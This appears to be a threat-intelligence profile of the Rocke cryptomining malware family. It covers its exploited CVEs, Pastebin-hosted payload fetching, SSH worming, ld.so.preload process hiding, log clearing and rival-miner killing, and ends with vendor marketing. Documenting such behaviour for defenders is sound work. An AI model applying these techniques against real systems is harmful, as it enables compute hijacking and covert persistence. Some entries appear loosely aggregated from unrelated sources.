Rocke
Rocke is a cryptomining malware family/threat activity cluster associated with compute hijacking on Linux and Windows systems. The content links Rocke to exploitation of public-facing applications, including Apache Struts, Oracle WebLogic via CVE-2017-10271, and Adobe ColdFusion via CVE-2017-3066, to deliver malware. Rocke used shell scripts and Python-based malware to install and spread coinminers, and also leveraged SSH and private keys present on infected machines to move laterally, including attempts to SSH to hosts found in known_hosts. Persistence mechanisms described include cron jobs, init.d startup scripts, systemd service scripts, and, on Windows, UPX-packed files placed in the Start Menu folder.
Rocke used Pastebin, Gitee, and GitLab as web-based command-and-control or payload-hosting infrastructure. It issued wget requests from infected systems to C2, executed wget and curl commands to Pastebin over HTTPS, and used Pastebin as a dead-drop resolver to check malware versions and redirect victims to updated payloads. Additional behaviors in the content include downloading and extracting tar.gz payloads, compiling delivered .c files with GCC, and downloading libprocesshider. Rocke modified /etc/ld.so.preload to hook libc functions and hide the dropper and mining software from process listings.
Defense evasion and anti-competition behaviors attributed to Rocke include scripts that detected and uninstalled antivirus software, killing processes, adding firewall rules to block competing cryptominers, clearing /var/log files, deleting files on infected machines, and changing file timestamps to hinder forensic analysis. The miner was also saved under the filename "java" to masquerade as legitimate software. The content further notes Rocke can detect a running process PID on an infected machine. Rocke scanned for exposed TCP port 7001 as well as SSH and Redis services. One cited network detail is that Rocke's miner connected over non-standard port 51640; on Windows, a miner component named TermsHost.exe injected into processes including Notepad.exe to evade defenses.
Indicators and references directly mentioned in the content include ClamAV detections such as "Unix.Downloader.Rocke" and "Unix.Downloader.Rocke-6826000-0," use of Pastebin/Gitee/GitLab for C2, and mention of Rocke/KORKERDS artifacts such as /tmp/.x/kworker in rival-miner context.
Hunt this family in your stack
Mallory pivots from this family to the IOCs, detections, and named campaigns that touch your stack, and pages you when something new lands.
Vulnerabilities exploited
5 CVEs Mallory has correlated with this family across public research and vendor advisories. Each row links to the full Mallory page for that vulnerability.
Threat actors are continuing to exploit a critical Langflow vulnerability as part of fresh attacks designed to deliver a Monero cryptocurrency miner. The activity has been found to weaponize CVE-2026-33017 (CVSS score: 9.3), an unauthenticated remote code execution (RCE) vulnerability in Langflow, indicating threat actors are scanning and targeting exposed artificial intelligence (AI) application endpoints for obtaining initial access to enterprise networks.
Rocke exploited Apache Struts, Oracle WebLogic (CVE-2017-10271), and Adobe ColdFusion (CVE-2017-3066) vulnerabilities to deliver malware.
Rocke exploited Apache Struts, Oracle WebLogic (CVE-2017-10271), and Adobe ColdFusion (CVE-2017-3066) vulnerabilities to deliver malware.
ClamAV signatures include "Unix.Downloader.Rocke" in the list of malware activity associated with ongoing exploitation campaigns.
The following analytic identifies remote code execution (RCE) attempts targeting F5 BIG-IP, BIG-IQ, and Traffix SDC devices, specifically exploiting CVE-2020-5902.
Techniques & procedures
7 distinct techniques documented for this family, organized by ATT&CK tactic.
Stealth
5 techniques
Stealth
"Action RAT's commands, strings, and domains can be Base64 encoded within the payload." / "ADVSTORESHELL... strings... encrypted with an XOR-based algorithm; some strings are also encrypted with 3DES and reversed." / "APT29 has used encoded PowerShell commands." / "APT41 used VMProtected binaries..."
"Sandworm Team used UPX to pack a copy of Mimikatz"; "APT38 has used several code packing methods such as Themida, Enigma, VMProtect, and Obsidium"; "Lazarus Group packed malicious .db files with Themida to evade detection."
“DLLs and EXEs with filenames associated with common electric power sector protocols were used to masquerade files… actors used the following command to rename one of their tools to a benign file name: ren "%temp%\upload" audiodg.exe … has used legitimate names and locations for files to evade defenses.”
Discovery
2 techniques
Discovery
"...used tasklist to enumerate processes..."; "...used the ps command to list processes..."; "...calling CreateToolhelp32Snapshot... to enumerate the running processes..."
"4H RAT sends an OS version identifier in its beacons"; "admin@338 actors used ... ver ... systeminfo"; "Bundlore will enumerate the macOS version ... using /usr/bin/sw_vers -productVersion"; "DarkTortilla ... querying ... WMI objects"; "Turla ... discover operating system configuration details using the systeminfo and set commands"
Recent activity
12 sources tracked across advisories, community write-ups, and news. New activity surfaces here as Mallory finds it.
Referenced as a competing cryptomining malware family whose processes are terminated by lambsys.
A Linux cryptomining family/lineage referenced both as a rival family targeted by lambsys and as the most plausible technique lineage for the campaign, based on shared SSH worming and cleanup behaviors.
Unix downloader referenced via detection signatures as associated with malware activity seen during Log4j exploitation campaigns.
Linux/Unix downloader malware referenced via detection signatures as part of activity associated with Log4j exploitation campaigns.
The version that knows your environment.
Match every observed IP, domain, and hash against your live telemetry.
Named campaigns wielding this family, with evidence pinned to each claim.
CVEs this family uses for access and lateral movement.
YARA, Sigma, Snort, and vendor rules, auto-deployed to your SIEM.
Every documented technique, ranked by evidence weight.
Reddit, Mastodon, and CTI community discussion around this family.